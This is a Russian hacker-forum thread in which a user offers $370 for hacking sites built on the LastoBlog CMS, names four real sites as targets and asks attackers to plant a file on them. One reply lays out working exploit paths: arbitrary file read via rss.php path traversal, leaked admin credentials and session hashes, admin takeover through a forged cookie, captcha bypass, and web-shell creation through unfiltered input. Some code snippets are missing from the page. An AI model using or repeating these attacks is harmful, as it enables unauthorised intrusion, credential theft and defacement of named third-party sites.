![]() |
Хочу провести конкурс на взлом LastoBlog
Приветствую господа!
Когда то юзал CMS LastoBlog, несколько раз дефейсили его, следовательно взлому он поддается :) Гонорар $370 тому, кто похакает сайт на этом движке. Сайт не затирайте просто, положите какой-нибудь файл, вот парочка таргетов на этом движке: blog.d21.ru goldguru.ru/blog/ dimox.biz prmstudio.com Если нужна сама cms, пишите в личку. Результаты будут опубликованы здесь. Впирьйод на бобра! |
Ссылку на скачку двига выкладывай в теме.
|
Или хотябы в личку ответь, на офф. сайте двиг платный.
|
ссыль на скачку пульни в личку, и имхо нужно к гарантам форума обратиться.
|
Дистриб Cms
Выложил, забирать тут.
|
Ибо, мне кажется, ты часть файлов забыл в архив положить... Сразу бросается в глаза отсутствие в корне файлов login.html, connect.html, search.html и др. Можешь выложить какую-нить менее коцанную версию?
|
Я так понимаю, если я залью любой файл в корень любого из сайтов в этой теме на этом движке я полочу гонарар или там будут дополнительные условия?
|
Цитата:
|
Скорей всего тебя сломали через другой сайт.
так же как inhacking.org. смотри логи |
посмотрел исходники, эти и свежие с офф. сайта(10WMZ).
Твои несколько устарели. Но ни там ни сям нет глобальных уязвимостей. Есть опасные моменты. Есть недочеты по безопасности из разряда "как не надо делать". Но если сервак настроен правильно - воспользоваться не выйдет. Сломать можно либо через хсс, либо только через revers-ip. Не даю гарантии. Мог что-то не заметить, однако копал довольно долго и придирчиво. |
Вобщем, я подумал еще раз и.... В том коде что ты дал(старые исходники): ========================== Чтение произвольного файла. Массив $posts не определен изначально. При register_globals=ON мы можем внести свои файлы в список отображаемых. Требование: register_globals=ON Эксплоит: /rss.php?posts[]=../session.php /rss.php?posts[]=../settings.php /rss.php?posts[]=../blog_settings.ini /data/session.php <? $_s["sid"]="74e8cbbe945570109125f10a20bf5df8"; ?> /data/settings.php $_s['pass'] = "fsdkj8309u7ghowrj32"; // пароль для входа в админку. /data/blog_settings.ini login="admin"; логин для входа в админку. pass="entero"; пароль для входа в админку. pepetun="default"; измените на любое английское слово. email="vadim_lasto@mail.ru"; Вырезка уязвимого кода: /rss.php PHP код:
Так получаем админские привилегии по хешу из "/data/session.php" COOKIE: admin_connected=74e8cbbe945570109125f10a20bf5df8; Вырезка уязвимого кода: /index.php PHP код:
Зачетный обход капчи в куках: Вырезка уязвимого кода: /index.php PHP код:
========================== ========================== В свежих исходниках с сайта: Last Blog version_05.10.07 work [i] возможная не\работоспособность кода обусловлена кривостью дезендера ========================== Обход капчи в куках: /key.php PHP код:
Создание шела. В секции "new","old" имя файла $fn не определено При register_globals=ON мы можем переопределить путь /index.php PHP код:
Создание шела. $_POST['text'] не фильтруется и подставляется в имя записываемого файла. Желательно magic_qoutes=OFF /remoute.html POST: [some_parameters_here] Вырезка уязвимого кода: /data/php_pages/remoute.php PHP код:
|
| Время: 19:37 |